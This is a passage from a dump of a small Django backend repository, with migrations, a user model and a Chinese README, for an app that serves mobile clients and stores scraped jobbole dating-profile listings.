"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 16:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0005_jobbole_detail_data_jobbole_image_data'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='jobbole_detail_data',\n name='images_url_datas',\n ),\n ]\n"
},
{
"alpha_fraction": 0.6858513355255127,
"alphanum_fraction": 0.7553957104682922,
"avg_line_length": 26.66666603088379,
"blob_id": "e5625dac9fdf88a1f6664ab68f66e4beeaa8de72",
"content_id": "5b03880aaabbfcb90da880ed5427264248fc8665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 585,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 15,
"path": "/README.md",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# gsite_python_web\n1. 这是我用Django搭建的后台系统,主要负责是给Android和iOS平台来调用接口。\n\n2. 后台系统是用用Django自带的Admin。\n\n3. 环境为Python 3.5.1, Django 版本为 1.11.1\n\n4. 一部分数据可以自己编辑,一部分数据可以通过Scrapy 来爬去,目前已经爬去的网站:\n\n> http://date.jobbole.com/ (伯乐在线)\n\n\n---\n\n---\n\n\n"
},
{
"alpha_fraction": 0.531438410282135,
"alphanum_fraction": 0.5607235431671143,
"avg_line_length": 36.45161437988281,
"blob_id": "1b3daa6b387c6bd7239f47381bc0200fe95be701",
"content_id": "6ef3ede79b4d086b998e82f07e1b900572ecfc66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1215,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 31,
"path": "/apps/gApi/migrations/0003_jobbole_date.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 10:39\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0002_news_userinfo'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='jobbole_date',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('custom_description', models.CharField(max_length=200, verbose_name='自我描述')),\n ('detail_info_url', models.CharField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('publish_time', models.CharField(max_length=45, verbose_name='发布时间')),\n ('location', models.CharField(max_length=45, verbose_name='地址')),\n ('fav_num', models.IntegerField(default=0)),\n ],\n options={\n 'verbose_name': '相亲信息',\n 'verbose_name_plural': '相亲信息',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6848306059837341,
"alphanum_fraction": 0.6966126561164856,
"avg_line_length": 36.72222137451172,
"blob_id": "9c2f8af993de719397624ee18206eb59ddee0008",
"content_id": "b2dc3d9e71936b2667616c4bed6d61ed95531226",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 18,
"path": "/apps/users/models.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom datetime import datetime\n\n# Create your models here.\nclass UserInfo(AbstractUser):\n nick_name = models.CharField(max_length=50, verbose_name=u\"昵称\", default=\"\")\n mobile = models.CharField(max_length=11, verbose_name=u\"手机号码\")\n avatar = models.ImageField(upload_to=\"avatar/%Y/%m\", default=\"avatar/default.png\", max_length=100)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=u\"添加时间\")\n\n class Meta:\n verbose_name = u\"用户信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.username\n"
},
{
"alpha_fraction": 0.3472222089767456,
"alphanum_fraction": 0.5,
"avg_line_length": 23.33333396911621,
"blob_id": "fabce21acb43e9b7e3f9afcdb4547893e7b0656c",
"content_id": "765282fc5bb3a43d9db362c0cec987d6c349ec75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/apps/__init__.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n__author__ = 'Gh'\n__date__ = '2017/5/25 下午3:51'"
},
{
"alpha_fraction": 0.5359342694282532,
"alphanum_fraction": 0.5564681887626648,
"avg_line_length": 30.419355392456055,
"blob_id": "db48d051da1a3c38e1db9e8fd8430eba074f3b80",
"content_id": "39d1cdb6fa630d22d52f8ab695105c2a774f5501",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 31,
"path": "/apps/gApi/migrations/0001_initial.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-25 07:46\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='News',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=200, verbose_name='标题')),\n ('summary', models.TextField(verbose_name='摘要')),\n ('thumbnail', models.ImageField(upload_to='thumbnail/%Y/%m', verbose_name='缩略图')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='添加时间')),\n ],\n options={\n 'verbose_name': '新闻',\n 'verbose_name_plural': '新闻',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5232142806053162,
"alphanum_fraction": 0.5523809790611267,
"avg_line_length": 39,
"blob_id": "cd724581a97567dab8176393416699f321e89716",
"content_id": "eb5447a46143c95bfb692f2f865fd4329c952ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 42,
"path": "/apps/gApi/migrations/0005_jobbole_detail_data_jobbole_image_data.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0004_auto_20170609_1136'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='jobbole_detail_data',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('detail_description_content', models.TextField(verbose_name='详细的自我描述')),\n ('detail_info_url', models.URLField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('images_url_datas', models.CharField(max_length=300, verbose_name='妹子发的图片集')),\n ],\n options={\n 'verbose_name': '相亲详细信息',\n 'verbose_name_plural': '相亲详细信息',\n },\n ),\n migrations.CreateModel(\n name='jobbole_image_data',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('detail_info_url', models.URLField(max_length=300, verbose_name='详情链接')),\n ('detail_info_url_object_id', models.CharField(max_length=50, verbose_name='链接的加密')),\n ('image_url', models.CharField(max_length=300, verbose_name='妹子发的单张图片')),\n ],\n options={\n 'verbose_name': '相亲图片信息',\n 'verbose_name_plural': '相亲图片信息',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5399284958839417,
"alphanum_fraction": 0.5721096396446228,
"avg_line_length": 26.96666717529297,
"blob_id": "851bfa2be99cc39288dbc1eb6dd218a095beb437",
"content_id": "5bf32c3c94be4e6c23260bb2dac12ff4d4c18114",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 30,
"path": "/apps/gApi/migrations/0004_auto_20170609_1136.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 11:36\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0003_jobbole_date'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='jobbole_date',\n name='detail_info_url',\n field=models.URLField(max_length=300, verbose_name='详情链接'),\n ),\n migrations.AlterField(\n model_name='jobbole_date',\n name='fav_num',\n field=models.IntegerField(default=0, verbose_name='喜欢数'),\n ),\n migrations.AlterField(\n model_name='jobbole_date',\n name='location',\n field=models.CharField(max_length=45, verbose_name='发布地址'),\n ),\n ]\n"
}
] | 14 |
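The commented-out paging in gApi/views.job above amounts to a bounded 50-row slice per page. A runnable sketch of that slicing rule in isolation (the name page_slice is illustrative, not part of the repo):

def page_slice(page_index, total, page_size=50):
    # Clamp out-of-range page numbers back to the first page, mirroring the
    # intent of the paging logic in views.job above.
    if page_index < 1 or (page_index - 1) * page_size >= total:
        page_index = 1
    return (page_size * (page_index - 1), page_size * page_index)

assert page_slice(1, 120) == (0, 50)
assert page_slice(3, 120) == (100, 150)
assert page_slice(9, 120) == (0, 50)   # out of range -> first page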
StavC/LinearRegressionCarPrices
|
https://github.com/StavC/LinearRegressionCarPrices
|
a31ef92abd931c94c3093be963751ba96805b87e
|
329915c948262812552893b3c30abfe34d3928bb
|
3f1696ee37880a2a94e1dc8d93788021c1ecea7a
|
refs/heads/master
| 2020-07-28T19:15:55.536845 | 2019-09-19T11:59:50 | 2019-09-19T11:59:50 | 209,507,545 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.668838620185852,
"alphanum_fraction": 0.681077778339386,
"avg_line_length": 47.12711715698242,
"blob_id": "29bd95a25a54989431daa09b4e9f35c83f756642",
"content_id": "ef5f0664289ca3ca2cdeb798cb9aa8d5a8ee7ca7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11357,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 236,
"path": "/LinerRegerssionCarPrices.py",
"repo_name": "StavC/LinearRegressionCarPrices",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nimport seaborn as sns\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\ndef main():\n sns.set()\n raw_data=pd.read_csv('1.04. Real-life example.csv')\n pd.set_option('display.expand_frame_repr', False)\n print(raw_data.describe(include='all'))\n ## it will be hard to implement model that has 312 unique models so will drop it\n data=raw_data.drop(['Model'],axis=1)\n #print(data.describe(include='all'))\n #print(data.isnull().sum())\n #price and Enginev has null so drop the null entrys\n data_no_missing_values=data.dropna(axis=0) #drop all the entrys with missing values\n #print(data_no_missing_values.describe(include='all'))\n #sns.distplot(data_no_missing_values['Price'])\n #plt.show()\n # we can see we have strong outliners in the graph and in the describe the max value is 300000 far from the mean 19552\n # we can drop the 0.99% of high prices to get rid of the outliners\n q=data_no_missing_values['Price'].quantile(0.99)\n data_1=data_no_missing_values[data_no_missing_values['Price']<q]\n # getting all the entrys that are less than 99% of the max price\n #print(data_1.describe(include='all'))\n # the max is closer to the mean now lets plot the data\n #sns.distplot(data_1['Price'])\n #plt.show()\n #less outliners\n #deal with the mileage the same way\n q=data_1['Mileage'].quantile(0.99)\n data_2=data_1[data_1['Mileage']<q]\n #sns.distplot(data_2['Mileage'])\n #plt.show()\n data_3=data_2[data_2['EngineV']<6.5] #EngineV cant be above 6.5 from google\n #year has outliners in the low precent so get rid of them\n q=data_3['Year'].quantile(0.01)\n data_4=data_3[data_3['Year']>q]\n #sns.distplot(data_4['Year'])\n #plt.show()\n data_cleaned=data_4.reset_index(drop=True)\n print(data_cleaned.describe(include='all'))\n\n # f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True, figsize=(15, 3)) # sharey -> share 'Price' as y\n #ax1.scatter(data_cleaned['Year'], data_cleaned['Price'])\n # ax1.set_title('Price and Year')\n #ax2.scatter(data_cleaned['EngineV'], data_cleaned['Price'])\n #ax2.set_title('Price and EngineV')\n #ax3.scatter(data_cleaned['Mileage'], data_cleaned['Price'])\n #ax3.set_title('Price and Mileage')\n\n #plt.show()\n # From the subplots and the PDF of price, we can easily determine that 'Price' is exponentially distributed\n # A good transformation in that case is a log transformation\n #sns.distplot(data_cleaned['Price'])\n # Let's transform 'Price' with a log transformation\n log_price = np.log(data_cleaned['Price'])\n\n # Then we add it to our data frame\n data_cleaned['log_price'] = log_price\n\n # f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=True, figsize=(15, 3))\n # ax1.scatter(data_cleaned['Year'], data_cleaned['log_price'])\n #ax1.set_title('Log Price and Year')\n #ax2.scatter(data_cleaned['EngineV'], data_cleaned['log_price'])\n #ax2.set_title('Log Price and EngineV')\n #ax3.scatter(data_cleaned['Mileage'], data_cleaned['log_price'])\n #ax3.set_title('Log Price and Mileage')\n # The relationships show a clear linear relationship\n # This is some good linear regression material\n # Alternatively we could have transformed each of the independent variables\n #plt.show()\n\n ###### check for multicollinearity\n # To make this as easy as possible to use, we declare a variable 
where we put\n # all features where we want to check for multicollinearity\n variables = data_cleaned[['Mileage', 'Year', 'EngineV']]\n vif = pd.DataFrame()\n # here we make use of the variance_inflation_factor, which will basically output the respective VIFs\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n # Finally, I like to include names so it is easier to explore the result\n vif[\"Features\"] = variables.columns\n #print(vif)\n # Since Year has the highest VIF, remove it from the model\n # This will drive the VIF of other variables down!!!\n # So even if EngineV seems with a high VIF, too, once 'Year' is gone that will no longer be the case\n data_no_multicollinearity = data_cleaned.drop(['Year'], axis=1)\n variables = data_no_multicollinearity[['Mileage', 'EngineV']]\n vif = pd.DataFrame()\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n vif[\"Features\"] = variables.columns\n #print(vif)\n # the VIF is low for Mileage and EngineV\n\n #### create Dummy Variables\n data_with_dummys=pd.get_dummies(data_no_multicollinearity,drop_first=True)\n #print(data_with_dummys.head())\n # To make the code a bit more parametrized, let's declare a new variable that will contain the preferred order\n\n cols = ['log_price', 'Mileage', 'EngineV', 'Brand_BMW',\n 'Brand_Mercedes-Benz', 'Brand_Mitsubishi', 'Brand_Renault',\n 'Brand_Toyota', 'Brand_Volkswagen', 'Body_hatch', 'Body_other',\n 'Body_sedan', 'Body_vagon', 'Body_van', 'Engine Type_Gas',\n 'Engine Type_Other', 'Engine Type_Petrol', 'Registration_yes']\n data_preprocessed = data_with_dummys[cols]\n\n ### geting VIF for all features\n # Let's simply drop log_price from data_preprocessed\n variables = data_preprocessed.drop(['log_price'], axis=1)\n vif = pd.DataFrame()\n vif[\"VIF\"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])]\n vif[\"features\"] = variables.columns\n #print(vif)\n\n\n ###### Linear Regerssion Model\n # The target(s) (dependent variable) is 'log price'\n targets = data_preprocessed['log_price']\n\n # The inputs are everything BUT the dependent variable, so we can simply drop it\n inputs = data_preprocessed.drop(['log_price'], axis=1)\n # Create a scaler object\n scaler = StandardScaler()\n # Fit the inputs (calculate the mean and standard deviation feature-wise)\n scaler.fit(inputs)\n # Scale the features and store them in a new variable (the actual scaling procedure)\n inputs_scaled = scaler.transform(inputs)\n\n ### TRAIN TEST SPLIT\n x_train, x_test, y_train, y_test = train_test_split(inputs_scaled, targets, test_size=0.2, random_state=365)\n\n # Create a linear regression object\n reg = LinearRegression()\n # Fit the regression with the scaled TRAIN inputs and targets\n reg.fit(x_train, y_train) #X the values,Y the right log price\n # Let's check the outputs of the regression\n # I'll store them in y_hat as this is the 'theoretical' name of the predictions\n y_hat = reg.predict(x_train)\n # The simplest way to compare the targets (y_train) and the predictions (y_hat) is to plot them on a scatter plot\n # The closer the points to the 45-degree line, the better the prediction\n plt.scatter(y_train, y_hat)\n # Let's also name the axes\n plt.xlabel('Targets (y_train)', size=18)\n plt.ylabel('Predictions (y_hat)', size=18)\n # Sometimes the plot will have different scales of the x-axis and the y-axis\n # This is an issue as we won't be able to interpret the '45-degree line'\n # We 
want the x-axis and the y-axis to be the same\n plt.xlim(6, 13)\n plt.ylim(6, 13)\n plt.show()\n # Another useful check of our model is a residual plot\n # We can plot the PDF of the residuals and check for anomalies\n sns.distplot(y_train - y_hat)\n\n # Include a title\n plt.title(\"Residuals PDF\", size=18)\n\n # In the best case scenario this plot should be normally distributed\n # In our case we notice that there are many negative residuals (far away from the mean)\n # Given the definition of the residuals (y_train - y_hat), negative values imply\n # that y_hat (predictions) are much higher than y_train (the targets)\n # This is food for thought to improve our model\n # Find the R-squared of the model\n reg.score(x_train, y_train)\n\n # Note that this is NOT the adjusted R-squared\n # in other words... find the Adjusted R-squared to have the appropriate measure :)\n # Obtain the bias (intercept) of the regression\n print(reg.intercept_)\n # Create a regression summary where we can compare them with one-another\n reg_summary = pd.DataFrame(inputs.columns.values, columns=['Features'])\n reg_summary['Weights'] = reg.coef_\n print(reg_summary)\n # Check the different categories in the 'Brand' variable\n data_cleaned['Brand'].unique()\n # In this way we can see which 'Brand' is actually the benchmark-AUDI\n ### TESTING\n # Once we have trained and fine-tuned our model, we can proceed to testing it\n # Testing is done on a dataset that the algorithm has never seen\n # Luckily we have prepared such a dataset\n # Our test inputs are 'x_test', while the outputs: 'y_test'\n # We SHOULD NOT TRAIN THE MODEL ON THEM, we just feed them and find the predictions\n # If the predictions are far off, we will know that our model overfitted\n y_hat_test = reg.predict(x_test)\n\n # Create a scatter plot with the test targets and the test predictions\n # You can include the argument 'alpha' which will introduce opacity to the graph\n plt.scatter(y_test, y_hat_test, alpha=0.2)\n plt.xlabel('Targets (y_test)', size=18)\n plt.ylabel('Predictions (y_hat_test)', size=18)\n plt.xlim(6, 13)\n plt.ylim(6, 13)\n plt.show()\n\n #Finally, let's manually check these predictions\n # To obtain the actual prices, we take the exponential of the log_price\n df_pf = pd.DataFrame(np.exp(y_hat_test), columns=['Prediction'])\n # Therefore, to get a proper result, we must reset the index and drop the old indexing\n y_test = y_test.reset_index(drop=True)\n df_pf['Target'] = np.exp(y_test)\n\n # Additionally, we can calculate the difference between the targets and the predictions\n # Note that this is actually the residual (we already plotted the residuals)\n df_pf['Residual'] = df_pf['Target'] - df_pf['Prediction']\n\n # Since OLS is basically an algorithm which minimizes the total sum of squared errors (residuals),\n # this comparison makes a lot of sense\n # Finally, it makes sense to see how far off we are from the result percentage-wise\n # Here, we take the absolute difference in %, so we can easily order the data frame\n df_pf['Difference%'] = np.absolute(df_pf['Residual'] / df_pf['Target'] * 100)\n # Sometimes it is useful to check these outputs manually\n # To see all rows, we use the relevant pandas syntax\n pd.options.display.max_rows = 999\n # Moreover, to make the dataset clear, we can display the result with only 2 digits after the dot\n pd.set_option('display.float_format', lambda x: '%.2f' % x)\n # Finally, we sort by difference in % and manually check the model\n df_pf=df_pf.sort_values(by=['Difference%'])\n 
print(df_pf)\n print(f\"R2: {reg.score(x_train, y_train)}\")\n n = x_train.shape[0]\n p = x_train.shape[1]\n\n adjusted_r2 = 1 - (1 - reg.score(x_train, y_train)) * (n - 1) / (n - p - 1)\n print(f\"adjusted r2 {adjusted_r2}\")\n\nif __name__ == '__main__':\n main()"
}
] | 1 |
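The script above ends by computing adjusted R-squared by hand. The same formula, isolated into a runnable helper for clarity (the function name and the sample numbers are illustrative):

def adjusted_r2(r2, n, p):
    # n = number of training rows, p = number of predictors.
    return 1 - (1 - r2) * (n - 1) / (n - p - 1)

print(adjusted_r2(0.75, 3000, 17))  # ~0.7486, barely below the raw R^2

With n much larger than p, the penalty term (n - 1) / (n - p - 1) stays close to 1, which is why the adjusted value hardly moves here.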
falcevor-study/relational-metadata-parser
|
https://github.com/falcevor-study/relational-metadata-parser
|
9b862bfd0a20295a82525677ee47415ea1709c41
|
5ae9342030f26833d4fc7506bbb999fc8ce29b24
|
d7deccc6a0164e7fb04c2615f4bc555675f9847f
|
refs/heads/master
| 2021-12-25T13:18:12.724339 | 2017-12-30T07:07:26 | 2017-12-30T07:07:26 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7044335007667542,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 21.55555534362793,
"blob_id": "7fb9adb0df88b5d587f892aa7b90c8325a425a8d",
"content_id": "6c404d554800cbbc7b58230b8a78c624d4f43d95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/convert_xml_to_dbd.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport ram_repr.ram_to_dbd as ram2dbd\nimport xml_repr.xml_to_ram as xml2ram\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: путь к файлу с XML; путь для создания DBD.')\n\nxml = sys.argv[0]\ndbd = sys.argv[1]\n\nprint('Создания RAM представления...')\nschemas = xml2ram.read(xml)\n\nprint('Создание DBD представления...')\nram2dbd.upload(schemas, dbd)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.7239709496498108,
"alphanum_fraction": 0.7336561679840088,
"avg_line_length": 26.53333282470703,
"blob_id": "36b455a8c6503ef575822279409fffd195e4f08f",
"content_id": "1759a0febdd78357b73f31f43c0417441f75196a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 15,
"path": "/create_empty_db.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport db_deploy.ddl_applying as deploy\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 2 параметра: название БД; путь к XML или DBD представлению.')\n\ndb_name = sys.argv[0]\nrepr_file = sys.argv[1]\n\nprint('Создание пустой БД PostgreSQL...')\ndb = deploy.DbCreationConnection('database.cfg', 'dbd_queries_sqlite.cfg')\ndb.deploy(db_name=db_name, repr_file=repr_file)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.6726303696632385,
"alphanum_fraction": 0.6738675236701965,
"avg_line_length": 34.86347961425781,
"blob_id": "660ac1e98db689a205573405ef073a0f60d9232a",
"content_id": "c264135424bef5e1873681bf280b261e0fe8ad0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12152,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 293,
"path": "/ram_repr/ram_to_xml.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\"\nМодуль, содержащий метод выгрузки объектного представления базы в RAM в файловое представление в виде XML.\n\"\"\"\n\nfrom codecs import open as _open\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom xml_repr.minidom_fixed import Document\n\n\ndef write(schema, output):\n \"\"\" Выгрузить структуру базы из RAM в XML-файл.\n\n :param schema: выгружаемая схема базы.\n :param output: путь к файлу, в который необходимо произвести выгрузку.\n :return: None\n \"\"\"\n # Инициализируется dom-документ.\n doc = Document()\n\n # Заполняется объект схемы.\n dbd_schema = _create_schema_dom(schema, doc)\n doc.appendChild(dbd_schema)\n\n # Заполнаяется непонятный тэг. Необходим для того, чтобы результаты сошлись в любом случае.\n custom_output = doc.createElement('custom')\n dbd_schema.appendChild(custom_output)\n\n # Заполняется структура доменов.\n domains_output = doc.createElement('domains')\n dbd_schema.appendChild(domains_output)\n for domain in schema.domains.values():\n domain_output = _create_domain_dom(domain, doc)\n domains_output.appendChild(domain_output)\n\n # Заполняется структура таблиц.\n tables_output = doc.createElement('tables')\n dbd_schema.appendChild(tables_output)\n for table in schema.tables.values():\n table_output = _create_table_dom(table, doc)\n\n for field in table.fields.values():\n # Заполняется структура поля.\n field_output = _create_field_dom(field, doc)\n table_output.appendChild(field_output)\n\n for constraint in table.constraints:\n # Заполняется структура ограничения.\n constraint_output = _create_constraint_dom(constraint, doc)\n table_output.appendChild(constraint_output)\n if len(constraint.details) < 2:\n continue\n for detail in constraint.details:\n # Заполняется структура деталей ограничений.\n detail_output = _create_constraint_detail_dom(detail, doc)\n constraint_output.appendChild(detail_output)\n\n # Заполняется структура индексов.\n for index in table.indexes:\n index_output = _create_index_dom(index, doc)\n table_output.appendChild(index_output)\n if len(index.details) < 2:\n continue\n for detail in index.details:\n # Заполняется структура деталей индексов.\n detail_output = _create_index_detail_dom(detail, doc)\n index_output.appendChild(detail_output)\n\n tables_output.appendChild(table_output)\n # Происходит выгрузка созданной dom-схемы в файл.\n doc.writexml(_open(output, 'w', 'utf-8'), '', ' ', '\\n', 'utf-8')\n\n\ndef _create_schema_dom(schema: Schema, doc: Document):\n \"\"\" Создать DOM-элемент Схемы, определить все его атрибуты.\n\n :param schema: Объект RAM-представления Схемы.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Схемы.\n \"\"\"\n schema_dom = doc.createElement('dbd_schema')\n if schema.fulltext_engine:\n schema_dom.setAttribute('fulltext_engine', schema.fulltext_engine)\n if schema.version:\n schema_dom.setAttribute('version', schema.version)\n if schema.name:\n schema_dom.setAttribute('name', schema.name)\n if schema.description:\n schema_dom.setAttribute('description', schema.description)\n return schema_dom\n\n\ndef _create_domain_dom(domain: Domain, doc: Document):\n \"\"\" Создать DOM-элемент Домена, определить все его атрибуты.\n\n :param 
domain: Объект RAM-представления Домена.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Домена.\n \"\"\"\n domain_dom = doc.createElement('domain')\n if domain.name:\n domain_dom.setAttribute('name', domain.name)\n if domain.description:\n domain_dom.setAttribute('description', domain.description)\n if domain.type:\n domain_dom.setAttribute('type', domain.type)\n if domain.align:\n domain_dom.setAttribute('align', domain.align)\n if domain.width:\n domain_dom.setAttribute('width', domain.width)\n if domain.length:\n domain_dom.setAttribute('length', domain.length)\n if domain.precision:\n domain_dom.setAttribute('precision', domain.precision)\n\n props = []\n if domain.case_sensitive:\n props.append('case_sensitive')\n if domain.show_null:\n props.append('show_null')\n if domain.show_lead_nulls:\n props.append('show_lead_nulls')\n if domain.thousands_separator:\n props.append('thousands_separator')\n if domain.summable:\n props.append('summable')\n if len(props) > 0:\n domain_dom.setAttribute('props', ', '.join(props))\n\n if domain.scale:\n domain_dom.setAttribute('scale', domain.scale)\n if domain.char_length:\n domain_dom.setAttribute('char_length', domain.char_length)\n return domain_dom\n\n\ndef _create_table_dom(table: Table, doc: Document):\n \"\"\" Создать DOM-элемент Таблицы, определить все его атрибуты.\n\n :param table: Объект RAM-представления Таблицы.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Таблицы.\n \"\"\"\n table_dom = doc.createElement('table')\n if table.name:\n table_dom.setAttribute('name', table.name)\n if table.description:\n table_dom.setAttribute('description', table.description)\n\n props = []\n if table.add:\n props.append('add')\n if table.edit:\n props.append('edit')\n if table.delete:\n props.append('delete')\n if len(props) > 0:\n table_dom.setAttribute('props', ', '.join(props))\n return table_dom\n\n\ndef _create_field_dom(field: Field, doc: Document):\n \"\"\" Создать DOM-элемент Поля, определить все его атрибуты.\n\n :param field: Объект RAM-представления Поля.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Поля.\n \"\"\"\n field_dom = doc.createElement('field')\n if field.name:\n field_dom.setAttribute('name', field.name)\n if field.rname:\n field_dom.setAttribute('rname', field.rname)\n if field.domain:\n field_dom.setAttribute('domain', field.domain)\n if field.type:\n field_dom.setAttribute('type', field.type)\n if field.description:\n field_dom.setAttribute('description', field.description)\n\n props = []\n if field.input:\n props.append('input')\n if field.edit:\n props.append('edit')\n if field.show_in_grid:\n props.append('show_in_grid')\n if field.show_in_details:\n props.append('show_in_details')\n if field.is_mean:\n props.append('is_mean')\n if field.autocalculated:\n props.append('autocalculated')\n if field.required:\n props.append('required')\n if len(props) > 0:\n field_dom.setAttribute('props', ', '.join(props))\n return field_dom\n\n\ndef _create_constraint_dom(constraint: Constraint, doc: Document):\n \"\"\" Создать DOM-элемент Ограничения, определить все его атрибуты.\n\n :param constraint: Объект RAM-представления Ограничения.\n :param doc: DOM-документ, для которого производится создание элемента.\n :return: DOM-элемент Ограничения.\n \"\"\"\n constraint_dom = doc.createElement('constraint')\n if constraint.name:\n constraint_dom.setAttribute('name', constraint.name)\n if 
